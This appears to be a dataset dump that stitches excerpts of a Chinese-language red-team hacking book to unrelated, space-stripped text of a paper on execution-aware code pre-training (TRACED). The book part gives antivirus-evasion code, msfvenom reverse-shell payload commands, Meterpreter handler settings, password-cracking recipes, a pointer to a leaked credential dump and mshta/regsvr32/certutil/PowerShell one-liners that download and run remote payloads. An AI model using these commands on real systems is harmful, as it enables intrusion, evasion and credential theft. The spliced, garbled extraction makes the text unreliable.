text
stringlengths
64
2.99M
int decrypt(const char* string, char result[]){ int key = 6; int len = strlen(string); for(int n = 0; n < len; n++){ int symbol = string[n]; int e_symbol = symbol - key; result[n] = e_symbol; } result[len] = '\0'; return 0; } 另一种规避杀毒软件的方法是使用函数指针调用User32.dll中的函数,而不是直接调用函数。
另一个非常明显的改进是将可执行文件转换为DLL,然后将DLL注入正在运行的进程,使得进程不会显示在任务管理器中。 有一些程序可以显示系统上所有当前加载的DLL,因此注入DLL会更加隐蔽。
表7.1 0 shellcode 发送原始shellcode字节到客户端 1 DLL 发送正常DLL文件,客户端反射注入DLL 虽然静荷(shellcode/DLL)可以来自任何类型的命令和控制工具(Metasploit/Meterpreter、Cobalt Strike等),但我们将在示例中使用Meterpreter静荷。
msfvenom -a x64 -p windows/x64/meterpreter/reverse_http LHOST=<Your_IP> LPORT= <PORT> EnableStageEncoding=True -f c 注意,您必须获取msfvenom输出,并得到原始shellcode(删除引号、换行以及任何不是shellcode的内容)。
msfvenom -a x64 -p windows/x64/meterpreter/reverse_http LHOST=<Your_IP> LPORT= <PORT> EnableStageEncoding=True -f dll > msf.dll 启动服务器:./thpd ./msf.dll 1 7.3.3 客户端 客户端与服务器的运行方式是相似的,其中客户端为每种消息类型注册处理程序。
7.3.4 配置客户端和服务器 大多数客户端的配置都可以在globals.cpp文件中找到,您需要更改的3个主要配置是主机名、端口和数据包持续时间。
7.4 重新编译Metasploit/Meterpreter规避杀毒软件和网 络检测 这个话题有些复杂,您很可能在编译过程中遇到一些问题。 有很多值得推荐的工具,如Metasploit/Meterpreter,每个杀毒软件和网络入侵检测(NID)工具都对这些工具进行签名。
任何类型的混淆通常都会有一个根签名,可以被发现和检测,杀毒软件在内存特定位置查看特定的字符串,网络设备实施中间人策略对HTTPS通信内容进行检查。
https://github.com/rapid7/metasploit-payloads/tree/master/c/meterpreter。 https://github.com/rapid7/metasploit-framework/wiki/Setting-Up-a-Metasploit- Development- Environment。
Visual Studio 2013(VS2013):Visual Studio社区版即可,另外,需要安装C/C ++编译环境。 在Windows中安装LLVM(32位)(安装Visual Studio之后,确保安装LLVM工具链):可在LLVM官网下载LLVM 6。
git clone https://github.com/cyberspacekittens/metasploit-framework。 cd metasploit-framework && git submodule init && git submodule update && cd ..。 git clone https://github.com/cyberspacekittens/metasploit-payloads。 cd metasploit-payloads && git submodule init && git submodule update && cd ..。
cd metasploit-framework\external\source\metsvc\src 使用make编译。 "C:\Program Files (x86)\GnuWin32\bin\make.exe" 将新创建的二进制文件移动到meterpreter文件夹。 copy metsvc.exe ..\..\..\..\data\meterpreter\。 copy metsvc-server.exe ..\..\..\..\data\meterpreter\。
copy metasploit-payloads\c\meterpreter\output\x86* metasploit-framework\data\ meterpreter。 copy metasploit-payloads\c\meterpreter\output\x64* metasploit-framework\data\ meterpreter。
这是Metasploit的所有功能的基础,在许多杀毒软件解决方案中都有针对Metasploit特定行为的高级签名技术和启发式检测方法,甚至修改shellcode并添加垃圾代码,仍然由于启发式检测而被标记。
为了解决这个问题,我们编写了自己的Stage 0,执行同样的功能(在内存中下载和执行):复制Meterpreter的reverse_https静荷的下载代码,从服务器获取metsrv.dll,然后在内存中存储并执行。
在Visual Studio 13中,打开metasploit-payloads\c\x64_defender_bypass\x64_defender_ bypass.vcxproj。 在x64_defender_bypass下有一个settings.h文件。
一个名为SharpShooter的工具采用了许多反沙箱技术,James Forshaw编写的DotNetToJScript可用来执行Windows脚本格式的shellcode(CACTUSTORCH工具见GitHub相关网页)。
打开一个新终端,创建一个csharp Meterpreter静荷 msfvenom -a x86 -p windows/meterpreter/reverse_http LHOST=10.100.100.9 LPORT= 8080 EnableStageEncoding=True StageEncoder=x86/shikata_ga_nai -f csharp 复制“{”和“}”之间的所有内容,采用字节数组形式提交 为CSharp网络传递提供URI。
图7.2 7.6 应用程序白名单规避 我们已经讨论了在不运行PowerShell代码的情况下触发PowerShell的不同方法,但如果您无法在Windows系统上运行自定义二进制文件,该怎么办?
图7.4 注意:我确实看到GreatSCT正在“开发”分支(见GitHub中GreatSCT页面的tree/develop子页面)上积极构建,其中包括HTTPS Meterpreter和其他白名单绕过机制。
一旦在被攻击的计算机的Windows上具备执行权限,使用命令“C:\Windows\Microsoft. NET\Framework\v4.0.30319\MSBuild.exe shellcode.xml”,.NET将开始构建shellcode.xml文件。
Powershell.exe -NoProfile -NonInteractive -WindowStyle Hidden -ExecutionPolicy Bypass IEX (New-Object Net.WebClient).DownloadString('[PowerShell URL]'); [Parameters]。
在Windows中,下载Invoke-Obfuscation PowerShell文件。 加载PowerShell脚本,启动Invoke-Obfuscation。 Import-Module ./Invoke-Obfuscation.psd1 Invoke-Obfuscation 设置混淆的PowerShell脚本。
虽然目前杀毒软件通常会对操作行为进行标记,但是我们可以使用相同的思路创建二进制文件,直接执行PowerShell恶意软件,无须运行PowerShell.exe。
因此,我整理了一个小的Python脚本,该脚本采用PowerShell脚本对所有字符串进行混淆处理(由于仅仅使用少量的脚本进行测试,因此它远达不到生产代码标准)。
这就是为什么需要理解防护系统底层的工作原理、编写底层代码来直接与Windows API进行交互而不是使用Shell命令、跳出设备本身进行思考并发挥创造性等非常重要。
我们通常可以编写恶意软件规避杀毒软件的检测,即使通过了初次安全防护检测,但是一旦使用类似mimikatz(在内存中)工具或者横向渗透到另一台主机,就会引发警报。
use multi/handler set payload windows/meterpreter/reverse_https set LHOST 10.100.100.9 set LPORT 443 set AutoRunScript post/windows/manage/priv_migrate set ExitOnSession false set EnableStageEncoding true exploit -j 运行处理程序。
gedit /opt/empire_autoload.rc 添加您需要执行的后渗透模块。 usemodule situational_awareness/network/powerview/get_user execute back usermodule situational_awareness/network/powerview/get_computer execute back 在Empire中加载autoload.rc资源文件,如图8.1所示。 agents autorun /opt/empire_autoload.rc powershell autorun show 图8.1 正如您看到的,当代理回连时,它会自动运行get_user和get_computer PowerShell脚本。
8.1.3 Cobalt Strike自动化 Cobalt Strike功能强大的主要原因之一是Aggressor Script。 使用Cobalt Strike的Aggressor Script,您不仅可以配置自动运行样式脚本,而且可以创建非常复杂的攻击。
现在,我不想直接提供torrent链接,因为其中包含很多敏感的用户名(或电子邮件)和相关密码,您可以搜索BreachCompilation.tar.bz2查找更多的相关信息。
Speed.Dev.#1.....: 59436.3 MH/s (63.16ms) Speed.Dev.#2.....: 58038.3 MH/s (64.70ms) Speed.Dev.#3.....: 59104.4 MH/s (63.55ms) Speed.Dev.#4.....: 59123.0 MH/s (63.52ms) Speed.Dev.#5.....: 58899.7 MH/s (63.74ms) Speed.Dev.#6.....: 59125.8 MH/s (63.51ms) Speed.Dev.#7.....: 59256.3 MH/s (63.36ms) Speed.Dev.#8.....: 59064.5 MH/s (63.56ms) Speed.Dev.#*.....: 472.0 GH/s 对于那些买不起大型GPU设备的人来说,还有其他选择。
Speed.Dev.#1.....: 79294.4 MH/s (33.81ms) Speed.Dev.#2.....: 79376.5 MH/s (33.79ms) Speed.Dev.#3.....: 79135.5 MH/s (33.88ms) Speed.Dev.#4.....: 79051.6 MH/s (33.84ms) Speed.Dev.#5.....: 79030.6 MH/s (33.85ms) Speed.Dev.#6.....: 79395.3 MH/s (33.81ms) Speed.Dev.#7.....: 79079.5 MH/s (33.83ms) Speed.Dev.#8.....: 79350.7 MH/s (33.83ms) Speed.Dev.#*.....: 633.7 GH/s NTLM计算总的速度比使用TESLA GPU大约快34%。
对于长度为1~7个字符的任何字母、数字或特殊字符(?a),使用攻击模式“brute-force”(-a 3)破解所有7个字符或更少的密码(增量)。
第一个文件(40GB_ Unique_File.txt)是一个3.2 GB大小的密码文件,运行大约需要9s。 [hashcat] ./lists/40GB_Unique_File.txt 正如我们所看到的,即使是最大的文件,计算的时间也只需要几秒。
[hashcat] ./lists/40GB_Unique_File.txt -r ./rules/rockyou-30000.rule 注意:使用3 GB大小文件设置NSAKEY规则,大约需要7min,而NotSoSecure的“The one rule to rule them all”规则集大约需要20min 我重新使用其他密码字典和规则集组合。
[hashcat] -i -a 6 ./lists/found.2015.txt ?a?a?a?a 需要花费大约30min时间完成4个字符的尝试 我们还可以在密码列表的左侧添加字符。
[hashcat] -i -a 7 ?a?a?a?a ./lists/40GB_Unique_File.txt 需要花费大约30min时间完成4个字符的尝试 hashcat应用:hashcat包括很多工具,可以帮助构建更好的密码字典。
./hashcat-utils-1.8/bin/combinator.bin lists/shortKrak.txt lists/shortKrak.txt > lists/ comboshortKrak.txt 使用排名靠前的Google 1 000字的列表会产生大约1.4 GB大小的字典文件,因此您必须小心地选择文件的大小。 ./hashcat-utils-1.8/bin/combinator.bin lists/google_top_1000.txt lists/google_top_ 1000.txt > lists/google_top_1000_combo.txt 输入4MB文件,运行combinator,生成的文件大于25 GB的存储空间。
Brutescrape - https://github.com/cheetz/brutescrape Burp Word List Extractor -https://portswigger.net/bappstore/21df56baa03d499c 8439018fe075d3d7 接下来,输入所有破解的密码,分析它们并用来创建掩码https://thesprawl.org/ projects/pack/。
python ./PACK-0.0.4/statsgen.py hashes.password python ./PACK-0.0.4/statsgen.py hashes.password --minlength=10 -o hashes.masks python ./PACK-0.0.4/maskgen.py hashes.masks --optindex -q –o custom-optindex. hcmask 使用新创建的掩码,运行密码破解。
图8.2 cd /opt/pipal ./pipal.rb hashes.password 查看密码字典,您可能会发现该公司使用resetme12345作为默认密码,公司可能位于密歇根州(底特律、老虎、足球)。
我们在现实生活中见证了WannaCry事件,WannaCry通过SMB共享横向移动,利用“永恒之蓝”漏洞,加密文件,甚至删除了主机系统上的所有备份。
一旦恶意软件被执行,它所做的就是扫描主机/网络中的重要文件,将每个文件读入内存,随机交换一个字节,将这些字节发送到命令控制服务器,并包含元数据。
$EventProvider = New-Object System.Diagnostics.Eventing.EventProvider –Argument List @([Guid]::NewGuid())。 $EtwProvider.SetValue($null, $EventProvider)。
8.6 在Windows中使用命令行从Internet下载文件 如果您通过应用程序漏洞获得执行权限,通过Office文件或PDF获得Shell,那么接下来的步骤可能是下载并执行后续恶意软件。
mshta vbscript:Close(Execute("GetObject(""script:http://webserver/payload.sct"")"))。 mshta http://webserver/payload.hta。 rundll32.exe javascript:"..\mshtml,RunHTMLApplication";o=GetObject("script: http:// webserver/payload.sct");window.close();。 regsvr32 /u /n /s /i:http://webserver/payload.sct scrobj.dll。 certutil -urlcache -split -f http://webserver/payload payload。 certutil -urlcache -split -f http://webserver/payload.b64 payload.b64 &certutil -decode payload.b64 payload.dll & C:\Windows\Microsoft.NET\Framework64\ v4.0.30319\ InstallUtil/ logfile= /LogToConsole=false /u payload.dll。 certutil -urlcache -split -f http://webserver/payload.b64 payload.b64 &certutil -decode payload.b64 payload.exe & payload.exe。
8.8 在不触及LSASS的情况下获取NTLM散列值 Elad Shamir进行了广泛的研究,并且清楚地分析了如何在不接触LSASS的情况下获取NTLM散列值。
您感到压力越来越大,因为您需要进入公司内部,了解公司的布局,获取敏感文件/代码,横向渗透到不同的用户和网络,并最终获取网络空间猫公司的秘密计划。
突破的主机信标被激活,开始运行Bloodhound工具,查找本地密码,设置注册表项,捕获mimikatz LSASS密码,运行SPN并转储所有Kerberos票证,当然,还要在计划任务中设置持久性参数。
但是,请记住,红队评估的目的是了解蓝队发现恶意攻击的速度有多快(他们没有这些活动),以及蓝队开展应急响应/取证和阻止攻击的时间。
因此,最后您要通知蓝队,运行脚本https://github.com/EmpireProject/Empire/blob/master/data/ module_source/trollsploit/Get-RickAstley.ps1,关闭计算机。
未知 第10章 赛后——分析报告 在之前的“黑客秘笈”系列图书中,我们介绍了如何编写渗透测试报告,并提供了大量示例模板。这些模板非常适合作为标准的渗透测试行动周总结报告,但不适用于红队行动。正如本书所述,红队的主要任务不在于识别漏洞本身(尽管通常是行动的一部分),而是测试员工安全意识、工具、流程和员工技能。如果您的公司受到演练人员或坏人的攻击并被突破,您会给自己什么样的成绩?我一直反对使用差距评估分数、ISO分数、成熟度模型分数、标准风险分析、热图和类似报告来展示公司安全流程的真实样子。 就个人而言,在红队行动前,我希望看到公司安全防护取得真正的进展。例如,对于使用类似doppelganger的网络钓鱼行动,我们看到公司启用了以下某些功能。 使用DNStwist对与其公司类似的域发出警报。 受信任的外部电子邮件域列表。任何不匹配的外部邮件,都将在最终用户可见的电子邮件中附加标题,表示邮件来自外部(非公司),是未经批准的电子邮件来源。这有助于您的用户更轻松地识别网络诱骗行为。 如果电子邮件中的任何链接来自于代理中未分类的域,那么至少在单击时会提醒用户域未被分类。 禁止Office宏以及附件,强制采用受保护的视图和沙箱机制。 这只是公司可以实施的一些简单的措施,可以有效阻止攻击。 请记住,红队只需要找到一个可能危及环境的安全漏洞。但是,与此同时,蓝队只需要识别攻击者的战术、技术和程序中的一个环节,就可以防止网络被突破。因此,现在的问题是,如果从您的工具中发现攻击者的一个环节,并发出警报,您的应急响应团队多长时间可以发现并做出响应? 那么红队报告中的内容包括什么?红队仍然是新的领域,目前还没有标准的报告模板,我们可以根据客户的需求进行定制。从我的角度来看,由于我们可能会在整个行动中尝试多次进入某个环境(并且被“抓住”了几次),因此我们希望展示好的与坏的两个方面。 至于行动中记录的内容,许多工具(如Empire和Cobalt Strike)在行动期间都有详细的事件日志,但这些还是远远不够的。在行动中非常有用的方式是,搭建一个简单的网络服务器,记录红队成员执行的每项行动。在行动期间仅收集基本的信息,包括特定事件、服务器、描述、影响、任何警报和屏幕截图。大多数红队/渗透测试人员都不愿做记录,网络服务器提供了一种跟踪行动的简单方法,如图10.1所示。 行动结束后,我们搜集所有记录,并将内容组合在一起,形成红队报告,用于讲述故事。红队报告的主要部分可能包括以下几点。 简介/范围:本节需要明确说明行动的目标。例如,客户要求我们获取特定数据,例如域管理员、个人验证信息和IP地址,或者在生产网络服务器中查找标志。 提示:行动中的应急响应/取证团队复盘非常有意义。我们需要识别工具或传感器可能缺少的位置,从而造成无法执行取证或检测恶意行动。因此,我们希望提供命令和控制服务器的IP地址、使用的域名、二进制文件的MD5/SHA1散列值,电子邮件地址和IP地址信息,被钓鱼的被攻击者列表,以及可能有助于应急响应/取证团队开展工作的其他任何信息。 图10.1 攻击时间表:这是红队战役中的一个重要的部分,需要做充分的记录。时间表应充分描述所有主要事件、触发警报的检测时间以及主要的行动步骤。这将允许蓝队对比时间表和记录,查看有什么差距。在真正的攻击中,您能够询问攻击者所做的一切吗?这对防御蓝队非常有帮助。时间轴示例可能如图10.2所示。 图10.2 检测时间(TTD)/缓解时间(TTM):通常我们可以使用蓝队报告中的TTD/TTM统计数据。总之,我们需要得到蓝队发现每次入侵的时间;扫描事件触发调查之前,经过了多长时间(如果有的话);蓝队发现网络钓鱼活动需要多长时间。第二部分应讨论采取行动之前的时间统计数据。如果已经识别命令和控制通信或者网络钓鱼攻击,防火墙或DNS服务器阻止该域需要多少时间?我们经常看到公司可能擅长阻止域名,却无法阻止命令和控制服务器使用IP地址通信(反之亦然)。我们希望跟踪事件并且为客户识别事件。另一个重要的TTM衡量标准是他们能否快速隔离确定的突破系统。随着恶意软件变得越来越自动化,我们需要开始利用智能和自动化流程,将系统或网络的一部分与组织的其他部分隔离开。 来自应急响应/取证人员的反馈:我喜欢记录蓝队的反馈,也就是他们从防守的角度如何看待整个行动。我想要了解的是,如果蓝队按照安全防护的规定,由事件牵头人启动调查,管理层深度介入,安全部门与IT部门如何交互促使IT部门改变(防火墙拦截、DNS修改等),以及恐慌或保持冷静的人。 如前所述,红队的目的不是寻找漏洞或破坏环境(尽管这是有趣的部分),红队的目的是提升、改善组织的整体安全流程,并证明组织的安全环境存在某些差距。如今,许多公司对于安全流程过于自信,因此他们不会在被突破之前进行改变。通过红队,我们可以模拟攻击,鼓励做出改变,从而确保不会发生真实的攻击事件。
未知 第11章 继续教育 我总是被问到的问题:“我现在该怎么办?我已阅读所有的“黑客秘笈”系列图书,参加了各种培训课程,并参加了很多会议!”。我现在可以给出的最好建议是,您应该开始从小的项目做起,并为安全社区做出贡献。这是真正测试您的技能的好方法。 下面列出了一些可能有用的想法。 设置博客和您自己的GitHub账户 :您应该写下所有经历和学习内容,并与他人分享这些内容,这确实有益于您个人的成长。通过博客记录您所学习的内容将提高写作的能力,以一种更容易理解的方式解释漏洞/漏洞利用,确保您对内容的理解足够深刻,可以向其他人解释清楚。 您的简历应该是您的GitHub账户 :我总是告诉我的学生,您的GitHub账户(或博客)应该能够独立存在。无论是各种小的安全项目,例如使得工具变得更高效和更有效,还是您自己的安全项目,您的工作都应该在GitHub上进行介绍。 在当地会议上发言 :演讲可能会非常令人生畏,但如果您在简历上有演讲经历,您比其他人更容易进入安全领域。从哪里可以找到演讲的机会?我建议您从本地的聚会开始,找到可以参与的组织。这些组织通常很小,每个人都非常友好。如果您在加利福尼亚州南部地区,我创办并且经营LETHAL,这是一个社区性质的免费安全组织,组织成员每月见面一次。无论如何,参与其中! Bug Bounties :无论您是攻击者还是防御者,赏金计划都可以真正地帮助您提升能力。HackerOne、BugCrowd和SynAck等Bug赏金计划可以免费注册。您不仅可以正大光明地赚到钱,还可以合法地破解目标网站(当然,需要在计划范围内)。 夺旗竞赛 :我知道很难抽出时间做所有这些事情,但我总是告诉我的学生:安全不是工作:这是一种生活方式。访问CTFtime.org,挑选一些CTF比赛,在那些周末开始比赛,然后开始攻击。相信我,您在CTF周末可以学到更多的内容,比任何课程都多。 与您的朋友一起建立一个实验室 :在测试实验室模拟公司环境,如果没有这样的测试环境,则很难在实际场景中开展行动。如果没有这个测试环境,那么在运行各种攻击性工具时,您将无法真正了解背后发生的事情。因此,必须构建一个全面的实验室,其中包含虚拟局域网、活动目录、服务器、GPO、用户和计算机、Linux环境、Puppet、Jenkins,以及您可能看到的所有其他常用工具。 向对手学习 :对于红队来说,这是一个很重要的因素。我们的行动不应该是理论上的,而是复制另一次真正的攻击。密切关注最新的APT报告,并确保了解对手如何改变他们的攻击方式。 关注“黑客秘笈”系列图书 :要了解最新的黑客秘笈新闻,请在此订阅thehackerplaybook。 培训 :如果您正在寻找一些培训,可以访问thehackerplaybook网站。 未知 致谢 本书贡献者 Walter Pearce Kristen Kim Bill Eyler Ann Le Michael Lim Kevin Bang Brett Buerhaus Tony Dow Tom Gadola 特别感谢 Mark Adams Tim Medin(nidem) SpecterOps Gianni Amato Casey Smith(@subTee) Robert David Graham Ben Ten(@Ben0xA) blechschmidt Vincent Yiu(@vysecurity) Jamieson O'Reilly Chris Spehn(@ConsciousHacker) Nikhil Mittal(SamratAshok) Barrett Adams(peewpw) Michael(codingo) Daniel Bohannon Cn33liz (@danielbohannon) Swissky(Swisskyrepo) Sean Metcalf(@PyroTek3) Robin Wood(digininja) @harmj0y TrustedSec Matt Graeber(@mattifestation) David Kennedy(@HackingDave) Matt Nelson(@enigma0x3) FireEye Ruben Boonen(@FuzzySec) Igandx Ben Campbell(@Meatballs ) Alexander Innes(leostat) Andrew Robbins(@_wald0) ActiveBreach(mdsecactivebreach) Raphael Mudge(@rsmudge) bbb31 Daniel Miessler(@DanielMiessler) pentestgeek Gianni Amato(guelfoweb) SECFORCE Ahmed Aboul-Ela(aboul3la) Steve Micallef Lee Baird(leebaird) SpiderLabs Dylan Ayrey(dxa4481) H.D. Moore Rapid7(@rapid7) TheRook Will Schroeder(@harmj0y) Ahmed Aboul-Ela(aboul3la) Ron Bowes(@iagox86) Emilio(epinna) SensePost Dylan Ayrey(dxa4481) Sekirkity George Chatzisofroniou(sophron) Byt3bl33d3r Derv(derv82) Karim Shoair(D4Vinci) Garrett Gee Chris Truncer HackerWarehouse Anshuman Bhartiya LETHAL OJ Reeves n00py Ben Sadeghipour(@nahamsec) Cover
第11章 赛后——分析报告 第12章 继续教育 12.1 漏洞悬赏网站 12.2 主要的安全会议 12.3 培训课程 12.4 免费培训 12.5 夺旗挑战 12.6 保持更新 12.6.1 邮件列表 12.6.2 播客 12.7 跟坏小子学习 最后的注意事项 致谢 封底
2306.07487 TRACED: Execution-aware Pre-training for Source Code YangruiboDing BenSteenhoek KexinPei ColumbiaUniversity IowaStateUniversity ColumbiaUniversity NewYork,NY,USA Ames,IA,USA NewYork,NY,USA GailKaiser WeiLe BaishakhiRay ColumbiaUniversity IowaStateUniversity ColumbiaUniversity NewYork,NY,USA Ames,IA,USA NewYork,NY,USA ABSTRACT requiresdeveloperstoanalyzewhetherapotentiallyproblematic Mostexistingpre-trainedlanguagemodelsforsourcecodefocuson locationcanbeexecutedandwhatkindsofvalueflowscanexpose learningthestaticcodetext,typicallyaugmentedwithstaticcode anyvulnerability.Whileexistingcodemodelsareprimarilytrained structures (abstract syntax tree, dependency graphs, etc.). How- tocapturestaticcodeproperties,theyarenoteffectiveatreasoning ever,programsemanticswillnotbefullyexposedbeforethereal aboutprogrambehavior.Infact,manyofthedeeperprogramse- execution.Withoutanunderstandingoftheprogramexecution, manticsonlymanifestwhenthecodeisexecuted.Asaresult,they staticallypre-trainedmodelsfailtocomprehensivelycapturethe tendtounderperformwhenitcomestotasksthatrequiredeeper dynamiccodeproperties,suchasthebranchcoverageandtherun- semanticunderstanding. timevariablevalues,andtheyareconsequentlylesseffectiveat codeunderstandingtasks,suchasretrievingsemanticclonesand detectingsoftwarevulnerabilities. Toclosethegapbetweenthestaticnatureoflanguagemod- els and the dynamic characteristics of programs, we introduce TRACED,anexecution-awarepre-trainingstrategyforsourcecode. Specifically,wepre-traincodelanguagemodelswithacombination ofsourcecode,executableinputs,andcorrespondingexecution traces.Ourgoalistoteachcodemodelsthecomplicatedexecution logicduringthepre-training,enablingthemodeltostaticallyes- timatethedynamiccodepropertieswithoutrepeatedlyexecuting codeduringtask-specificfine-tuning. To illustrate the effectiveness of our proposed approach, we fine-tuneandevaluateTRACEDonthreedownstreamtasks:static executionestimation,cloneretrieval,andvulnerabilitydetection. Figure1:AnmotivatingexamplefromCodeNet’scodingchallenge TheempiricalresultsshowthatTRACEDrelativelyimprovesthe No.3597[41]revealsthatstaticallypre-trainedcodelanguagemodels, staticallypre-trainedcodemodelsby12.4%forcompleteexecution regardlessoftheirsize,couldnotreasonaboutthebranchcoverage pathpredictionandby25.2%forruntimevariablevaluepredictions. givenaspecificinput,whileTRACED,enhancedwithprogramexe- cutionfeatures,correctlyidentifytheexecutionpath. TRACEDalsosignificantlyoutperformsstaticallypre-trainedmod- elsincloneretrievalandvulnerabilitydetectionacrossfourpublic benchmarks. MotivatingExamples. Figure1presentsanexamplewithsim- pleexecutionlogictoillustratethefailureofstaticallypre-trained 1 INTRODUCTION codemodelsonthebranchcoverageprediction.Wequerythree MachineLearning(ML)forsourcecodehasenabledmanysoft- pre-trained code models, CodeX [13] (code-davinci-002), Unix- wareengineeringtasks,suchasautomatedprogramrepair[11,21– Coder[17],andTRACED(ours),topredictthebranchcoverage, 23], bug finding [8, 54], and refactoring [7]. Recently, the com- accordingtothegivenprograminputs.ForCodeX,wepromptthe monpracticeoftrainingMLmodelsforsourcecodeunderstand- modelwithcarefullydesignedquestions,similarto[36],toaskfor ingisbasedonpre-trainingaTransformer-basedlanguagemodel thebranchcoveragepredictioninthezero-shotsetting.Specifi- on source code. These approaches treat source code programs cally,weaugmentthepromptsbyaddingcommentsattheend asstatictext [1,6,16,49],sometimesaugmentedwithprogram- oflines12and16:// Will this line be executed? Yes or specificstructuressuchasabstractsyntaxtreesanddependency no?.Togivemorehintsregardingthedataflow,wefurtheradda graphs[10,17,18,35],andadaptpre-trainingstrategiesfornatural commentattheendofline10:// A is -1, since it accepts languagetolearnprogramrepresentations. the second value of the input.Unfortunately,evenifprovided However,manysourcecodeunderstandingtasksrequireamore withadditionalhintsoftherequireddataflowforbranchprediction, comprehensiveunderstandingofprogrambehavior.Forinstance, CodeXstillfailedtopredictthecorrectcoveragelabels,suggesting detectingsemanticclones[32]involvesdeterminingiftwopiecesof itcannotinterpretthissimpleexecution. codebehavesimilarlyundersimilarinputs,eveniftheirstructures Besidesthezero-shotprompting,wealsostudywhetherfine- areapparentlydifferent.Likewise,detectingvulnerabilitiesoften tuningpre-trainedcodemodelstopredictexecutioncanleadto 3202 nuJ 31 ]ES.sc[ 1v78470.6032:viXraICSE2024,April2024,Lisbon,Portugal YangruiboDing,BenSteenhoek,KexinPei,GailKaiser,WeiLe,andBaishakhiRay betterbranchprediction.Specifically,wefine-tuneanotherpop- RepresentingExecutionCoverage. Whileprogramstatelabelspro- ular pre-trained code model, UnixCoder [17], to predict branch videimportantinformationaboutthecurrentstateoftheprogram,
executionwhileensuringthemotivationexampleisnotseendur- theydonotcaptureinformationabouthowtheprogramarrivedat ingtraining.FromtheinferenceresultsinFigure1,wenoticethat thatstate.Toboostthetrainingwithmorecomprehensiveexecu- UnixCodercannotpredictcoveredbranchesevenafterbeingfine- tionfeatures,besidesthevariablevalues,wealsologtheexecution tuned.Itpredictsneitherofthebrancheswillbecovered,indicating coverageduringtheexecution,intermsofwhichlinesareexecuted thatitdoesnothavethebasicunderstandingthat,forthisspecific andwhicharenot,andconstructexecutioncoveragefeaturesfor example,atleastonebranchwillalwaysbetakenonavalidinput. themodeltolearn. Ourapproach. Toaddressthelimitationofthestaticallypre- Results. Wefine-tuneandevaluateTRACED’sperformanceus- trainedcodemodels,weproposeTRACED,anexecution-aware ingthreetasks:staticexecutionestimation,cloneretrieval,and pre-trainingstrategytocapturethestaticanddynamicperspectives vulnerabilitydetection.Onstaticallypredictingtheprogramexe- ofthesourcecode.Specifically,wepre-traintheTransformer-based cutions,TRACEDsubstantiallyimprovesthestaticallypre-trained languagemodelwithmulti-taskobjectivesonpredictingsource codemodelsby12.4%forexecutionpathpredictionandby25.2% code,programstates,andexecutioncoverage,forcingthemodelto forruntimevariablevaluepredictions.TRACEDalsoobtainsstate- reasonaboutbothprogram’sruntimebehaviorandthenaturalness of-the-artresultsincodeunderstandingtasks:TRACEDreports ofthesourcecode[43]atthesametime.Weaddressseveraltech- 91.2%MAP@RonCodeXGLUE-POJ104[32],50.4%F1onReVeal[8], nicalchallenges,suchasrepresentingprogramexecutionstates, and65.9%accuracyonCodeXGLUE-defect-detection[32]. encodingtheruntimevariablevalues,andrepresentingcodecover- Contributions. Wemakethefollowingcontributions: age,toimplementthepre-trainingstrategy. • Wepresentasimplifiedandcompactrepresentationofpro- RepresentingProgramStates. Duringprogramexecution,vari- gramexecutions,includingtheprogramstatesandtheex- ablesareusedtostoredatathatisusedbytheprogram.These ecutioncoverage,toeffectivelyguidecodemodelstolearn variablescanhavedifferenttypes,suchasintegers,floating-point programsemanticsandreasonaboutprogrambehavior. numbers,pointers,andarrays.Astheprogramexecutes,thevalues • Weproposeanovelmulti-taskpre-trainingstrategytojointly ofthesevariableschange,reflectingthechangesintheprogram’s learnthestaticanddynamiccodeproperties.Asaresult,the state.Consequently,softwaredeveloperstypicallymonitorthevari- pre-trainedmodelwithourapproachwillbeempowered ablevalues,viadebuggingtools,toobservetheexecutionfacts[52] withadecentexecutionawareness. andunderstandthedynamicbehaviorsoftheprogram. • Wepre-train TRACED withthe proposedtrace represen- Inthiswork,wedefinetheprogramstateataspecifictimestep tation and the execution-aware strategy and evaluate its oftheexecutionasthesetofvaluesofeverydefinedvariablein performanceonseveraldownstreamtasks.Theexperiment thecurrentscope.Inotherwords,theprogramstateisequivalent resultsdemonstratethatTRACEDsignificantlyoutperforms tothevaluemappingtableofthedebugger,whichismonitoredby thestaticallypre-trainedcodemodelsinthesetasks. thedeveloperwhentheprogramispausedbyaspecificbreakpoint. • Wewillpubliclyreleaseourdata,code,andpre-trainedmod- elstofosteropenscience. ValueQuantization. Whiletheruntimevariablevaluesaretraced asconcretevalues,directlylearningthembroughtchallengesto 2 OVERVIEW machinelearningmodels.Concretevaluesspanoverawiderange ofpossiblevalues,especiallywhenconsideringdifferentdatatypes Figure2showstheoverviewof TRACED,consistingofthreemain (integers,floating-pointnumbers,arrays,pointers,etc.),leading stages:(1)tracingthesourcecodeandengineeringthefeatures, toahigh-dimensional,complex,butsparsedatadistribution.This (2) execution-aware pre-training using the program traces, and increaseddatacomplexityandsparsitychallengesthemodelto (3)loadingthepre-trainedweightsandperformingtask-specific learnpatternsandrelationshipsbetweenthevariablevalues,asit fine-tuning. mustdealwithmanyuniqueinputs,whichcausesthemodelto Stage-1:Tracing&FeatureEngineering. Thegoalofthisstage overfitandmemorizespecificinstancesratherthangeneralizeto istopreparethedataforpre-training.Theprocessbeginswithpro- broaderpatterns.Additionally,noise,outliers,andirregularitiesof vidingasourceprogramanditsexecutableinputs.Thefirststepis concretevaluesalsomisleadthemodel’slearningprocess.Wewill toexecutetheprogramwitheachinputtogeneratecorresponding empiricallydemonstratetheselimitationsin§6.3. traces.Thetracesrecordtheruntimevariablevalues,togetherwith Todecreasethedatacomplexityandincreasethedensity,we theexecutioncoverage,loggingthefullexecutionhistoryofthe definethirtyvaluecategories,coveringawiderangeofvariable programandrevealingthechangestoprogramstatesthroughout types,tomapthecontinuousbutsparsevariablevaluesintodiscrete execution.Toreducethecomplexityandsparsityofthedata,and
bins.Wecallthisprocessasvaluequantization,whichissimilarin makeiteasierforthemodeltolearnpatternsandrelationshipsbe- designtothequantizationinsignalprocessing1.Thissimplification tweenthevariablevalues,wequantizetheconcreteruntimevalues potentiallyhelpsthemodeltobemoreresilienttonoiseandoutliers, recordedinthetracesintopre-definedvalueranges.Thequanti- allowingittofocusonlearningtheunderlyingexecutionpatterns zationprocessmapscontinuousvaluestoafixedsetofdiscrete andrelationshipsbetweenvariables,ratherthanbeingsensitiveto orbins.Byquantizingthevalues,wecreateafinitesetofpossible specificinstancesorirregularities. outputsthatcanbeusedasground-truthlabelsduringtraining. 1https://en.wikipedia.org/wiki/Quantization_(signal_processing) Afterquantization,wecreateprogramstatelabelsandexecutionTRACED:Execution-awarePre-trainingforSourceCode ICSE2024,April2024,Lisbon,Portugal 3 TRACING&FEATUREENGINEERING 